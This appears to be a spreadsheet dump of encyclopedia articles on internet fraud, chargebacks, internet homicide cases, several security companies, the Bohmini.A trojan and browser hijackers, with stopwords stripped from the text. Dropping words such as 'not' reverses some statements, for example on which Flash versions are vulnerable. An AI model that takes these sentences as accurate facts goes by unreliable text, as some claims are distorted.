conventional phishing techniques could become obsolete future people increasingly aware social engineering techniques used phishers. they predict pharming uses malware become common tools stealing information. chargebacks chargeback necessarily fraudulent activity. basic sense, chargeback issuing bank, bank consumers acquire credit cards, reverses prior charge bank account credit card request cardholder problem transaction. problem could anything situation consumer receive product purchased, cardholder satisfied quality product, situation cardholder victim identity theft. concept chargeback rose measure consumer protection taken issuing banks credit card companies. chargebacks measure protect cardholders identity theft unauthorized transitions identity theft. chargebacks also provide incentive producers sellers provide products consistent quality efficient customer service. with rise technology, resulting increase online telephone transactions commerce, become easier commit fraud chargebacks. chargebacks interesting concept process protects consumers identity theft fraud, opens door consumers commit chargeback fraud. chargeback fraud also known “friendly fraud.” friendly fraud term consumer authorizes transaction online purchase credit card, receives product products consumer paid for, later consumer files chargeback. fraudulent filing chargeback results consumer keeping avoiding paying products ordered. there several common cases consumer commits called friendly fraud. situation consumer claims never received purchase order reality, did. scenario, customer files chargeback, enables customer keep product paying product. another situation customer claims product received either defective damaged. scenario, chargeback claim facilitates customer “two one” deal producer ship replacement product. finally, another common situation customer buys product, files chargeback issuing bank claiming never authorized transaction.producers merchants responded rise fraudulent chargeback claims implemented measures combat friendly fraud. chargeback fraud challenging vendor's first reaction tighten internal fraud controls anti-fraud software tools. while reduces fraud, also prevents many legitimate customers completing online purchases. addition, difficult merchants protect friendly fraud chargebacks chargeback process often favors consumers producers. best ways prevent friendly fraudsters online merchants require signatures delivered packages upon arrival. this provide specific information producers delivery. drawback signature confirmation increases shipping costs, still hurt producers’ bottom line. addition, producers started share data lists customers make chargeback claims. this helps producers trends customer’s shopping habits. this transfer information among producers helps maximize profits forces consumers stay honest. producers also started keeping record communication customers, customers want file fraudulent chargebacks harder time following claim. finally, e-commerce sites started keep track customer's addresses, consumers make claim make purchase, much harder lie.although chargeback fraud problem growth e-commerce alternative shopping outlets dishonest consumers, many consumers file chargeback claims honest encountered real problem transaction. cases, chargebacks reduced implementing refined tracking tools measure reasons returns employing live customer service personnel improving training. response 2001, deputy assistant director fbi, thomas kubic, gave testimony house committee energy commerce, subcommittee commerce, trade, consumer protection fbi's response internet fraud crimes. alongside u.s. postal inspection services, u.s. customs service, internal revenue service-criminal investigative division, united states secret service, developed "operation cyber loss" program combat internet fraud. agency also created internet fraud complaint center (ifcc) help operation. types fraud operation cyber loss investigating identity theft, on-line auction fraud, credit/debit card fraud, investment securities fraud, ponzi/pyramid schemes, non-delivery merchandise purchased internet. mitigating risk internet fraud businesses selling goods services online bear large portion internet fraud costs according 2017 lexisnexis study, fraud costs percentage revenues online retail (physical goods) ecommerce (digital goods) 2.17% 2.39% respectively, online gift card fraud area special concern.relying fraud detection software alone found flag many legitimate transactions fraudulent: online purchases either blocked outright delayed review customer abandons purchase. approach found successful reducing number "false positives" still reducing fraud "layered" filtering. this technique employs fraud detection software based algorithms ai/machine learning, combined manual review customer service personnel. real-time fraud detection supplied software-as-a-service (saas) fraud detection firms includes verifying cvv, pin/signature, check verification, browser malware detection, address verification, device fingerprinting, geolocation, authentication quizzes, cross-checking shared data bases customer profiles, automated transaction scoring, rules-based filters data points.in response prevalence online fraud, many fraud detection prevention software service companies entered field, employing variety techniques, including machine-learning-based behavior analytics anomaly detection; "fraud hub" enables third-party data sources feed purchaser information used predictive statistical modeling; automated remote malware detection. largest players area cybersource (owned visa), brighterion (mastercard), institute. some newcomers field include fraudio, signifyd, kount, riskified, sift science, forter feedzai. references reviews latest internet fraud (awareness scams)</t>
  </si>
  <si>
    <t>Internet fraud</t>
  </si>
  <si>
    <t>internet fraud type cybercrime fraud deception makes internet could involve hiding information providing incorrect information purpose tricking victims money, property, inheritance. internet fraud considered single, distinctive crime covers range illegal illicit actions committed cyberspace. however, differentiated theft since, case, victim voluntarily knowingly provides information, money property perpetrator. also distinguished involves temporally spatially separated offenders.according fbi's 2017 internet crime report, internet crime complaint center (ic3) received 300,000 complaints. victims lost $1.4 billion online fraud 2017. according study conducted center strategic international studies (csis) mcafee, cybercrime costs global economy much $600 billion, translates 0.8% total global gdp. online fraud appears many forms. ranges email spam online scams. internet fraud occur even partly based internet services mostly completely based internet. charity fraud scammer poses charitable organization soliciting donations help victims natural disaster, terrorist attack (such 9/11 attacks), regional conflict, epidemic. hurricane katrina 2004 tsunami popular targets scammers perpetrating charity scams; timeless scam charities purport raising money cancer, aids ebola virus research, children's orphanages (the scammer pretends work orphanage non-profit associated it), impersonates charities cross united way. recent years, cases scams done people started charity. recent example head long island charity, wafa abbound. abbound found guilty stealing close million dollars. charged bank fraud, money laundering, embezzling. there many methods scammers use. first, donations, often linking online news articles strengthen story funds drive. scammer's victims charitable people believe helping worthy cause expect nothing return. once sent, money gone scammer often disappears, though many attempts keep scam going asking series payments. victim sometimes find legal trouble deducting supposed donations income taxes. united states states charitable donations deductible made qualified non-profit organization. scammer tell victim donation deductible provide necessary proof donation, information provided scammer fictional, audited, victim faces stiff penalties result fraud. though scams highest success rates especially following major disaster employed scammers world, average loss victim less fraud schemes. this because, unlike scams involving largely expected payoff, victim less likely borrow money donate donate spare. internet ticket fraud variation internet marketing fraud offers tickets sought-after events concerts, shows, sports events. tickets fake never delivered. proliferation online ticket agencies existence experienced dishonest ticket resellers fueled kind fraud. many scams british ticket touts, though base operations countries.a prime example global 2008 beijing olympic games ticket fraud us-registered "xclusive leisure hospitality", sold professionally designed website name "beijing 2008 ticketing". august reported a$50 million worth fake tickets sold website. august reported person behind scam, wholly based outside china, british ticket tout, terance shepherd. online gift card fraud retailers businesses growing concerns preventing gift cards purchased stolen credit card numbers, cybercriminals recently focusing taking advantage fraudulent gift cards. more specifically, malicious hackers trying hands information pertinent gift cards issued spent. some methods stealing gift card data include automated bots launch brute force attacks retailer systems store them. first, hackers steal gift card data, check existing balance retailer's online service, attempt funds purchase goods resell third party website. cases gift cards resold, attackers take remaining balance cash, also used method money laundering. this harms customer gift card experience, retailer's brand perception, cost retailer thousands revenue. another gift card fraud committed stealing person's credit card information purchase brand gift cards. social media fraud people tend disclose personal information (e.g. birthday, e-mail, address, hometown relationship status) social networking profiles. this personally identifiable information could used fraudsters steal users' identities, posting information social media makes easier fraudsters take control problem authenticity online reviews long-standing stubborn one. famous incident back 2004, amazon's canadian site accidentally revealed true identities thousands previously anonymous u.s. book reviewers. insight mistake revealed many authors using fake names order give books favorable reviews. also, positive reviews lead trust business more, "the right circumstances", trust online reviews much personal recommendations.while scammers increasingly taking advantage power social media conduct criminal activity, astute risk managers insurance companies also finding ways leverage social media information tool combat insurance fraud. example, injured worker work worker's compensation claim could resist playing contact sport local semi-professional sports team. through social media internet searches, investigators discovered worker listed team roster playing well.a woman scammed "romance fraud" online local police. woman reportedly lost inheritance worth £320,000 taken parents later disowned following loss. perpetrator impersonated tim, victim dating website 2019 lost husband. first took £68,000 name customs fees asked directly £200,000 translator secure contractors store equipment, totalling money lost £320,000. counterfeit postal money orders according fbi, april 2005 zeller wrote article york times regarding surge quantity quality forging u.s. postal money orders, commit online fraud. counterfeiters conduct scams emails chat rooms. person trying sell give away item theirs, counterfeiters make believe related auction sites ebay. right now, figure much money taken fake orders, united states postal service believes millions. people targeted smaller retailers operate internet everyday people sell items web. owing lack rules warning signs counterfeiters, people affected. many companies like federal express started collaborate united states postal service begin surveilling money postal orders. this spot real fake, however easier said done, advocate users cautious making money postal orders. arrests taken place, 2004 2005, counterfeiters arrested. many arrested caught process cashing money stolen. united states america, penalty making using counterfeit postal money orders years jail and/or $25,000 fine. purchase fraud fraudster uses world wide advertise non-existent goods services. payment sent remotely goods services never arrive. methods scammers give fake products prices, want make payments electronic fund transfers, want right away. payments conducted paypal credit cards. these services secure cause issues scammers. methods also ways figure whether actually scams. another spot scam privacy contact details, information delivery, terms conditions, etc, presented. scammers fake stores. these fake stores scammers operate from, broadcast social media. this done primarily people social media number keeps growing every day. these stores long period. stay couple sales, move close site. usually, spot fake stores look online reviews, reviews, fake. also references sources legend, therza january 2018). "cyber fraud: aware, protect business". podiatry review. (1): 32–34. gale a524380313. lin, kan-min (september 2016). "understanding undergraduates' problems determinants facebook continuance intention". behaviour information technology. (9): 693–705. doi:10.1080/0144929x.2016.1177114. s2cid 5975706. external links internet fraud curlie</t>
  </si>
  <si>
    <t>Internet homicide</t>
  </si>
  <si>
    <t>internet homicide refers killing victim perpetrator online, cases known previously internet. also internet killer appellation found media reports person broadcasts crime murder online murders victim internet. depending venue used, terms used media internet chat room killer, craigslist killer, facebook serial killer. internet homicide also part internet suicide pact consensual homicide. some commentators believe reports homicides overemphasized connection internet. serial killers serial killers murderers target three victims sequentially, "cooling off" period murder, whose motivation killing largely based psychological gratification. such killers used forms social networking attract victims long advent internet. example, 1900 1914, hungarian serial killer béla kiss lured victims using personal published newspapers.according paul bocj, author cyberstalking: harassment internet protect your family, "the idea serial killer operated internet understandably, resulted great deal public anxiety." harold schecter's encyclopedia serial killers, entry "internet" reads part: internet become useful tool people interested serial killers, there's indication also prove resource serial killers themselves." maurice godwin, forensic consultant, argued "there sadistic predators rely mardi gras effect ["the ability hide one's identity internet"] lure murder repeatedly." first serial killer known used internet find victims john edward robinson, arrested 2000 referred enforcement news "usa's first internet serial killer" "the nation's first documented serial killer internet means luring victims." venues online predators, participants internet suicide suicide-homicide pacts, internet killers seek victims internet forums, chat rooms, listservs, email, bulletin boards, social networking sites, online role playing games, online dating services, yahoo groups, usenet. chat rooms online chatrooms sometimes used killers meet bait potential victims. example, japanese serial murderer hiroshi maeue known found victims using online suicide chat rooms. killer lisa montgomery reported victim online chatroom terrier lovers called "ratter chatter."online chatrooms also used, cases, plan consensual homicides. example, 1996, maryland woman, sharon lopatka, apparently agreed killed torture strangulation conversation online chatroom. robert frederick glass pleaded guilty killing lopatka later died prison serving sentence. case might regarded quasi-consensual homicide, "john," teenage altrincham, england, allegedly tricked another teenager killing using long conversations online chatroom. teenager, mark, apparently believed recruited female secret service agent. suicide-by-homicide failed 2004 john pleaded guilty inciting someone murder sentenced three years supervision. mark pleaded guilty attempted murder sentenced years supervision. boys forbidden contact other. online advertisements article york daily news explained 2009, "long craigslist dot-com dating, places women busy meet face face could find romance. calling "matrimonial bureaus," organizations known mostly "lonely hearts clubs," flourished middle 20th century." venues like these—print media newspaper classified personal lonely hearts club ads—that 20th century murderers harry powers, so-called "matrimonial bureau murderer," harvey carignan, "the want killer" victims. electronic advertising gradually replaced printed internet venue murderers employ similar modus operandi meet victims; schecter's encyclopedia, entry "ads" mentions internet dating internet so-called "internet cannibal" armin meiwes. since 2007, several accused convicted killers contacted victims advertising services craigslist, popular classified advertising website. these killers sometimes referred media "craigslist killers"; first term craigslist killings date october 2007, phrase appeared headline saint paul pioneer press minnesota, reference murder katherine olson michael john anderson, dubbed "the craigslist killer".since 2007, several suspected convicted perpetrators victims solicited murder craigslist. cases, convicted crimes three-month period encompassing february april 2009 four accused crimes 13-month span march 2008 april 2009. although, definition, craigslist initial contact point killing taken place order suspected, accused, convicted perpetrator dubbed craigslist killer, actual motivations criminals varied. victims' deaths result robbery sexual encounter turned violent. some perpetrators intended commit murder, killed victims course struggle prevent capture. each case different. internet dating 1995, match.com launched first online dating application. next decades, internet dating become second paid internet industry. however, people suffer relatedness frustration seek affection care online need met. self-esteem enhancement found produce problematic internet dating motive.according michael largo, author final exits: illustrated encyclopedia die, "internet dating becoming popular, since 1995, there's been[...] instances homicide related person [the victim] online." criticism concept several legal technology experts questioned idea phenomenon internet killings. legal theorist pressed internet angle murder journalist related asked whether, called asked blind date murdered her, would think "telephone-related murder"?". leslie harris, center democracy technology said term "craigslist killer" great many tragic incidents tangentially involve internet little nothing internet itself. craigslist case latest example phenomenon. craigslist innovative valuable resource, frankly, unfairly smeared internet site." book hypercrime argues "the looks, widely circulated instances 'cyberkilling' appear vanish smoke 'cyberspace'." susan brenner, professor technology wrote cybercrime john meet mary internet, correspond e-mail lure meeting kills her? news stories often describe conduct cybercrime, 'internet murder.' anything murder? not, example, refer killings orchestrated telephone 'tele-murder' snail mail 'mail murder.' seems cybercrime, simply real-world crime commission happens involve computer technology," conceded "there reasons treat conduct differently construe something conventional crime." notable internet homicides following individuals arrested and/or convicted crimes police claimed internet services chat rooms craigslist advertisements used contact victims hire murderer. despite sharing similar method contacting victims, apparently varied motivations. list below, victims' deaths premeditated, especially perpetrator serial killer, also resulted robbery, insurance fraud, sexual encounter turned violent. robert frederick glass, computer analyst north carolina killed sharon lopatka torture strangulation case apparent consensual homicide october 1996. lopatka used internet, also advertised pornography related unusual sexual fetishes, locate glass, later convicted voluntary manslaughter crime.in 1998, chris dean, truck driver indiana, sentenced life imprisonment murder 17-year-old chris marquis vermont. marquis operated scam would pose 27-year-old proprietor fictional shop called shack, offer trade merchandise people online. when people sent marquis goods, would either send anything back would send something broken. dean fell victim this, built pipe bomb mailed marquis, killing injuring mother. murder ofir rahum shooting attack occurred january 2001, palestinian militants tanzim faction fatah killed 16-year-old israeli high school student ofir rahum outskirts ramallah. murder planned initiated palestine liberation organization collaborator, 24-year-old mona jaud awana nabala. awana conducted long private conversations english rahum internet icq, masqueraded jewish israeli girl. awana managed gain rahum's confidence meet jerusalem, supposedly romantic purposes. when arrived meeting, drove border control palestinian-controlled territory towards secluded area outskirts ramallah palestinian terrorists shot close range, awana standing aside watching. awana tried convicted murder, sentenced life imprisonment.the consensual murder bernd jürgen brandes so-called "internet cannibal" armin meiwes; site called cannibal cafe, people described fantasies cannibalism, meiwes openly advertised willing victim.on december 2002, 13-year-old kacie rene woody abducted holland, arkansas home 47-year-old david leslie fuller, befriended chat room posing 17-year-old named david leslie fagen. following day, enforcement found deceased inside guardsmart storage conway. woody's body inside fuller's rented minivan, chained van's floor raping shooting head. fuller, sitting van's removed back seats behind van, shot head enforcement arrived.john edward robinson, known media "the internet slave master" "the first internet serial killer", victims online chat rooms. convicted murdering five women blunt force trauma head. edward frank manuel, arrested january 2003, dubbed "internet suicide chat room killer" united press international news sources.hiroshi maeue known "suicide website murderer". according article sydney morning herald, killer utilized "suicide websites [as] murder". although posed online someone wished carry internet suicide pacts, choked victims death person. garry francis newman, 50-year-old man, convicted murder 15-year-old carly ryan 2007. posed "brandon", 20-year-old musician, began online relationship online platforms myspace vampirefreaks.com. eventually lured carly secluded beach suburb port elliot, south australia subsequently murdered her. during arrest, search house revealed notebook detailing online personas. wake arrest trial newman, nationwide bill, nicknamed "carly's law", introduced criminalise acts done using carriage service prepare plan cause harm procure, engage sexual activity with, person thomas montgomery, 47-year-old married man, convicted 2007 murdering workmate case called "internet chatroom murder". posed "tommy", 21-year-old marine, began online relationship 17-year-old called jessi. workmate his, 22-year-old brian barrett, subsequently began online relationship girl montgomery's deception revealed, montgomery shot work park. "jessi" actually middle-aged woman using pictures daughter. police officer said montgomery: became completely different person online". another commented that: "it's someone would take another's life jealousy person never laid eyes on". documentary case titled talhotblond (jessi's screen name) released 2009. michael john anderson convicted murdering katherine olson minnesota october 2007. according article saint paul pioneer press, "the 19-year-old savage used craigslist lure katherine olson home fictitious baby-sitting job, shot back."bernard george lamp, 51-year-old resident troutman, north carolina charged murder first-degree kidnapping march 2008 death woman cornelius, north carolina; according news reports, "agreed meet accused killing encountering craigslist."ann marie linscott, 49-year-old michigan woman, arrested january 2008 soliciting murder craigslist, offered $5,000 "for someone willing kill unsuspecting wife she'd begun affair online"; february 2009, found guilty attempted murder-for-hire sentenced years seven months prison.in 2008, hughstan schlicker, 15-year-old mesa, arizona, shot killed father, schlicker. hughstan threatened suicide myspace post, ted—worried might kill himself—banned hughstan internet, angering him. also hidden family shotgun. however, hughstan played hooky school, found hidden shed, waited home father, shot back head father entered house. hughstan planned kill unable follow through.christian grotheer, known "germany's first internet killer," confessed murders 2009. according article daily telegraph, admitted "murdering women online chat rooms."david heiss, 21-year-old german office worker, became infatuated british girl, joanna witton, along boyfriend matthew pyke, administrator advance wars series fansite, wars central. after advances rebuffed, including visits, heiss traveled stabbed matthew pyke death. jailed life 2009. police spokesman noted that, "while extremely unusual case, thing clear heiss used internet harass stalk joanna matthew. eventually found lived information enabled carry plans. consider amounts personal information share systems like internet forums." john katehis, teenager, arrested indicted murder radio news reporter george weber york march 2009. craigslist, journals advocate called suspect "alleged craigslist killer".korena roberts arrested june 2009 allegedly killing 21-year-old heather snively—who eight-months pregnant—and fetus, cutting open abdomen. they reported advertisement roberts craigslist sale baby clothes. 2009, anthony powell, 28-year-old student henry ford community college detroit, shot killed fellow student, 20-year-old asia mcgowan, fatally shooting himself. powell history mental illness used youtube account make hate videos black women atheists. mcgowan also account youtube. powell became obsessed mcgowan account, began stalking youtube facebook. decided black women like mcgowan naturally promiscuous, made videos titles "black women don't deserve respect", shortly killing mcgowan. many powell's videos concerning many youtube users contacted detroit police them. philip markoff, known "the craigslist killer" numerous news reports, arrested indicted april 2009 murder julissa brisman attacks women occurred massachusetts rhode island; women online advertisements craigslist, advertised erotic services. markoff committed suicide jail cell august 2010, several months prior scheduled trial. 20-year-old richard samuel mccrosky california began online relationship 16-year-old emma niederbrock farmville, virginia. september 2009, visiting emma family virginia, mccrosky attacked murdered emma, well parents, debra kelly mark niederbrock, emma’s friend melanie wells niederbrock home. arrested, convicted murders sentenced life prison.david russell, mcdonald's worker, impersonated bring horizon singer oliver sykes seduce california woman facebook slitting throat repeatedly stabbing her. russell, jailed life admitting kidnap attempted murder maricar benedicto, online 2010.in 2013, richard beasley, 53-year-old summit county, ohio, convicted sentenced death luring three deaths using craigslist non-existent 2011. beasley convicted march kidnapping killing david pauley, norfolk, virginia; ralph geiger, akron, ohio, timothy kern, massillon, ohio. also convicted attempted murder scott davis, woodruff, south carolina answered shot escaping meeting beasley year accomplice, brogan rafferty. 2013, newlywed couple miranda elytte barbour arrested charged murder troy laferrara. barbours allegedly laferrara answered couple's craigslist offering "companionship" conversation exchange payment. february 2014, breck brednar, 14-year-old redhill, surrey murdered lewis daynes, 18-year-old unemployed software engineer groomed online gaming site. brednar found dead daynes' flat grays, essex stabbed multiple times. lewis daynes sentenced life imprisonment minimum years, february 2015, attorney david messerschmitt murdered hotel room washington, d.c. according police records, posted listing craigslist requesting sexual encounter, answered women planned him. suspect, 21-year-old jamyra gallmon, convicted second-degree murder sentenced years prison. gallmon's accomplice, 19-year-old dominique johnson, pled guilty conspiracy commit robbery sentenced year prison. popular culture theme internet homicide proven popular fiction, examples seen books, television shows, movies, number murderer referred "the internet killer" characters. following examples listed date order publication broadcast; three predate arrest 2000 john edward robinson, thought enforcement "the first internet serial killer": third-season episode x-files titled "2shy" featured monster week fat-eating mutant named virgil incanto seduced overweight women online killed upon meeting real life. second season series millennium featured episode called "the mikado", serial killer based loosely upon zodiac killer. killer would contact people internet chat groups, kidnap broadcast death live webcam site counter reached certain level. fifth season series criminal minds featured episodes involving internet serial killers. first, "risky business", killer website encouraging teenagers engage auto-erotic asphyxiation particularly dangerous manner, tricking committing suicide. second, "the internet forever", serial killer sets hidden cameras women's homes strangles death whole broadcast live "fans" see. strangeland 1998 film written snider schizophrenic sexual sadist lures victims internet, forcing submit ancient tribal rituals. came idea internet crime anybody ever committed internet crime," snider said. homicide: life street, television series police drama, featured extended multi-week storyline 1999 character named luke ryland known "the internet killer." feardotcom 2002 movie killer internet site. card player cartaio) 2004 film made italy; written directed dario argento, tells story policewoman rome teams british interpol agent track internet serial killer abducts kills young women broadcasts crimes internet cam. untraceable 2008 sony pictures film starring diane lane agent jennifer marsh tasked hunting seemingly untraceable serial killer posted live videos victims internet. downloading nancy 2008 film starring maria bello unhappy wife nancy stockwell decides life meeting internet forming consensual agreement kill her. march 2015, first week late late show james corden, host james corden listed several dozen ways connect show social media. list started "follow twitter, like facebook, ..." ended murder craigslist." american monster investigation discovery television series documentary-drama episode titled: craigslist killer aired: september 2017, dramatizes serial killer richard beasley's online enticing multiple deaths. also assisted suicide computer crime consensual homicide internet suicide pact lonely hearts killer want-ad killer) online predator references further reading linsky (august 2013). "the longform guide craigslist crime". slate.</t>
  </si>
  <si>
    <t>Intertrust Technologies Corporation</t>
  </si>
  <si>
    <t>intertrust technologies corporation software technology company specializing trusted distributed computing. intertrust’s product lines consist dataops platform, application protection content protection solutions. much intertrust's digital rights management (drm) business based marlin technology, intertrust founded along four consumer electronics companies: sony, panasonic, philips, samsung.intertrust headquartered silicon valley offices tokyo, seoul, london, paris, mumbai, beijing, tallinn, riga bangalore. history victor shear received sociology brandeis university, served chief executive data scientific corporation 1982 1985, co-founded personal library software. around 1985, shear attempted obtain first patents software. example, patent covered metering protecting data compact disc 1986.the company began name electronic publishing resources january 1990. david became involved intertrust early 1991. intertrust's technology, called digital rights management (drm), enabled trusted transactions, healthcare, enterprise computing entertainment consumer electronics. 1995, company announced technology would used novell. former bell labs fellow david maher became chief technology officer 1999. 1996, electronic publishing resources renamed intertrust technologies. peak internet bubble october 1999, despite lack earnings, intertrust initial public offering. listed nasdaq exchange symbol itru. within months, share price rose $35, secondary offering april 2000 raised another million. 2001, companies acquired: publishone, inc., zerogravity technologies, nokia invested million. however, 2001 losses climbed $115 million year, shares sometimes trading each. workforce reductions office closures announced october 2001 january 2002, helped losses. 2002, workforce reductions announced, marketing development software ceased company focused licensing intellectual property. early 2003, company became joint venture philips, sony stephens inc., talal shamoon appointed april 2004, microsoft settled 2001 lawsuit, agreed $440 million license intertrust’s patents. week settlement, microsoft time warner announced acquired majority stake contentguard, company developed similar software.in 2006, company co-founded coral consortium content interoperability fox, samsung, sony, philips, panasonic hp.intertrust licensed technologies large technology media corporations. company developed technology called marlin, mixed success. continued emphasis intellectual property caused company called "patent troll". huawei technologies announced would license marlin 2011. 2007 venture using marlin pioneer corporation called synctv investment corporation 2012.a public infrastructure (pki) service marlin called seacert announced 2011.between 2008 2016, intertrust invested companies developed synergistic technologies.in 2010, company entered latvian-based joint venture called whitecryption markets application security technologies.in march, 2013, intertrust filed patent suit apple inc. apple settled suit april 2014 undisclosed terms.in october 2014, princeton university professor robert tarjan rejoined intertrust chief scientist.in december 2016, company added investors, german utility company innogy (acquired e.on 2020) japan u.s. venture capital company world innovation lab. april 2017 company launched google patentshield program.in 2019, australian energy company origin energy invested million intertrust.in june 2020, company announced intertrust platform, described complete ecosystem data security rights management products”. references external links official website</t>
  </si>
  <si>
    <t>Intuitive Password</t>
  </si>
  <si>
    <t>intuitive password proprietary freemium password manager secure digital wallet stores users' passwords confidential data. launched 2013 australian company intuitive security systems. intuitive password received mixed reviews. neil rubeking wrote magazine 2013 intuitive password's automated password capture like competitors significant downside. history program developed australian company, intuitive security systems pty. ltd., uses advanced encryption standard-256. launched mid-2013. product create free intuitive password account, users supply email address, master password, self-populated security question answer. program's "logins category", users save website, database, server logins. "accounts category", users store credentials email accounts, instant messaging accounts, wireless routers. "wallets" category, users store credit card information. "licenses" category, users store credentials software hunting license. "identifications" category, users store like library cards.intuitive password lets clients kinds two-factor authentication. first factor master password. second factor either authentication code sent text message user's cellphone google authenticator. configurable options email users every block different countries logging very confidential information protected second master password. intuitive password permits users safely share authentication details others using logging public computers, users generate single-use password authentication. features reception 2013 softpedia review, gabriela vatu said intuitive password easy-to-use app, clean interface looks like strong security place protect user data".in 2013 magazine review, neil rubeking rated program "fair" wrote, "the lack automated password capture replay deal-breaker many users". 2015 magazine review, rubeking rated program "good". also comparison password managers cryptography list password managers password manager references external links official website</t>
  </si>
  <si>
    <t>Invincea</t>
  </si>
  <si>
    <t>invincea, inc. company offered suite endpoint protection software products. originally called secure command llc, invincea, inc. venture-backed software company provided malware threat detection, prevention, analysis stop advanced threats. acquired sophos february 2017. history company founded 2006 anup ghosh based fairfax, virginia. major investors included dell ventures, atlantic ventures, grotech ventures, aeris capital, harbert venture partners.in 2012, invincea used million grant darpa improve security military's android-based devices tablet smartphones. invincea software secured data unauthorized access protect devices malicious applications.in june 2013, dell announced partnership invincea began shipping endpoint security software dubbed "dell data protection protected workspace" commercial tablets worldwide. dell data protection included invincea container technology shield virtualized container around browser application instance protect rest device network resided.in december 2013, invincea acquired sandboxie undisclosed amount. sandboxie pioneer windows containment sandboxing market, also called “container” technology, acquisition made consolidate sandboxie invincea's container solution.in 2016, invincea launched invincea. invincea suite products protected endpoints detecting blocking known unknown malware without signatures real-time. combined deep learning, advanced form machine learning, behavioral analysis legacy invincea container technology, also known isolation technology, lightweight agent.in february 2017, invincea acquired sophos, security software hardware company. august year, subsidiary invincea labs renamed labs.in january 2018, sophos announced invincea's deep learning technology would integrated sophos intercept endpoint security product. april 2018, invincea announced selling invincea suite products. sophos products integrate invincea container technology. support maintenance remained available existing contracts december 2019, point, support maintenance invincea products ceased. sophos include invincea container technology intercept reason, sandboxie released free tool, sophos released container technology open source. references</t>
  </si>
  <si>
    <t>Bohmini.A</t>
  </si>
  <si>
    <t>bohmini.a configurable remote access tool trojan. bohmini.a exploits security flaws adobe flash 9.0.115 internet explorer firefox windows sp2. adobe flash 9.0.124 known vulnerable bohmini.a. july 2008, known bohmini.a spread malvertising 247mediadirect advertising network social networking site facebook. bohmini.a detected least known anti-virus product; microsoft windows live onecare. however, august 2008, microsoft windows live onecare remove bohmini.a completely, although claims detected removed remove bohmini.a windows known detecting anti-virus product windows live onecare control panel select switch classic view. then select scheduled tasks remove tasks prefix at1, ..., at24. bohmini.a installation customizable therefore implementations vary. example, executable names vary. bohmini.a configured notify update http. also trojan external links threat analysis telenor (norwegian) (translated english google) virustotal md5:a2cd6617e5b1c4b0a6df375d878d33f1 virustotal md5:45ecab7cc3aa1c86889ad6b13ed9838b</t>
  </si>
  <si>
    <t>Iretron</t>
  </si>
  <si>
    <t>iretron recommerce recycling service company gatos, california. allows consumers sell electronics, including cellphones, iphones, ipods, players, tablets, ipads, e-readers, calculators devices, free.the website users submit model condition used devices cash offer user either accept decline. iretron also repairs resells used electronics, offers free shipping.in 2014, company appeared show shark tank. also electronic waste united states references external links iretron</t>
  </si>
  <si>
    <t>Browser hijacking</t>
  </si>
  <si>
    <t>browser hijacking form unwanted software modifies browser's settings without user's permission, inject unwanted advertising user's browser. browser hijacker replace existing home page, error page, search engine own. these generally used force hits particular website, increasing advertising revenue. some browser hijackers also contain spyware, example, install software keylogger gather information banking e-mail authentication details. some browser hijackers also damage registry windows systems, often permanently. while browser hijacking easily reversed, instances difficult reverse. various software packages exist prevent modification. many browser hijacking programs included software bundles user choose included "offers" installer another program, often included uninstall instructions, documentation presented designed confusing average user, trick installing unwanted extra software.there several methods browser hijackers gain entry operating system. email attachments files downloaded suspicious websites torrents common tactics browser hijackers use. security rogue security software some rogue security software also hijack start page, generally displaying message "warning! your computer infected spyware!" lead antispyware vendor's page. start page return normal settings user buys software. programs winfixer known hijack user's start page redirect another website. non-existent domain pages domain name system queried user types name website (e.g., wikipedia.org) returns address website exists. user mistypes name website return non-existent domain (nxdomain) response. 2006, earthlink started redirecting mistyped domain names search page. this done interpreting error code nxdomain server level. announcement much negative feedback, earthlink offered services without feature. operation unwanted programs often include sign installed, uninstall opt-out instructions.most hijacking programs constantly change settings browsers, meaning user choices browser overwritten. some antivirus software identifies browser hijacking software malicious software remove some spyware scanning programs browser restore function user's browser settings back normal alert browser page changed. avoidance microsoft windows browsers longer user's default without intervention; changing default browser must performed manually user settings' "default apps" page, ostensibly prevent browser hijacking. examples hijackers number hijackers change browser homepage, display adverts, and/or default search engine; include astromenda (www.astromenda.com); toolbar (ask.com); esurf (esurf.biz) binkiland (binkiland.com); delta claro; dregol; jamenize; mindspark; groovorio; sweet page; mazy search; search protect conduit along search.conduit.com variants;tuvaro; spigot; en.4yendex.com; yahoo; etc. babylon toolbar babylon toolbar browser hijacker change browser homepage default search engine isearch.babylon.com. also form adware. displays advertisements, sponsored links, spurious paid search results. program collect search terms search queries. babylon's translation software prompts babylon toolbar installation. toolbar also comes bundled add-on software downloads.in 2011, cnet site download.com started bundling babylon toolbar open-source packages nmap. gordon lyon, developer nmap, upset users software tricked using toolbar. vice-president download.com, sean murphy, released apology: bundling software mistake part apologize user developer communities unrest caused.similar variants babylon toolbar search homepage exist including: bueno search, delta search, claro search, search gol. variants state owned babylon terms service. toolbars created montiera. conduit (search protect) conduit hijacker. steals personal confidential information user transfers third party. this toolbar identified potentially unwanted programs (pups) malwarebytes typically bundled free downloads. these toolbars modify browser's default search engine, homepage, page, several browser settings. there similar variants conduit search trovi.com, trovigo.com, better-search.net, seekforsearch.com, searchitdown.com, need4search.com, clearsearches.com, search-armor.com, searchthatup.com, premiumsearchweb.com, along variants created customized toolbar creation service conduit used offer.a program called "conduit search protect", better known "search protect conduit", cause severe system errors upon uninstallation. claims protect browser settings actually blocks attempts manipulate browser settings page; words, makes sure malicious settings remain unchanged. search protect option change search homepage "recommended" search home page trovi, however, users reported changing back trovi period time.the uninstall program search protect cause windows unbootable uninstall file removes files, also boot files root drive. leaves backgroundcontainer.dll file start-up registry. conduit associated malware, spyware, adware, victims hijacker reported unwanted pop-ups embedded in-text advertisements, sites without ads. perion network ltd. acquired conduit's clientconnect business early january 2014, later partnered lenovo create lenovo browser guard, uses components search protect. victims unwanted redirections conduit.com also reported attacked phishing attempts received unwanted email spam, junk mail, messages, telephone calls telemarketers. some victims claim callers claimed apple, microsoft, isp, told personal information used phone calls, calls concerned browsing habits recent browsing history. personal information used phishing attempts associated spyware. istartsurf.com browser hijacker istartsurf.com replace preferred search tools. this infection travels bundled third-party applications installation silent. this, affected users aware hijacker infected internet explorer, google chrome mozilla firefox browsers. search-daily.com search-daily.com hijacker downloaded zlob trojan. redirects user's searches pornography sites. also known slow computer performance. snap.do snap.do (smartbar developed resoft) potential malware, categorized browser hijacker spyware, causes internet browsers redirect snap.do search engine. snap.do manually downloaded resoft website, though many users entrapped unethical terms. affects windows removed add/remove program menu. snap.do also download many malicious toolbars, add-ons, plug-ins like dvdvideosofttb, general crawler, save valet. general crawler, installed snap.do, known backdoor 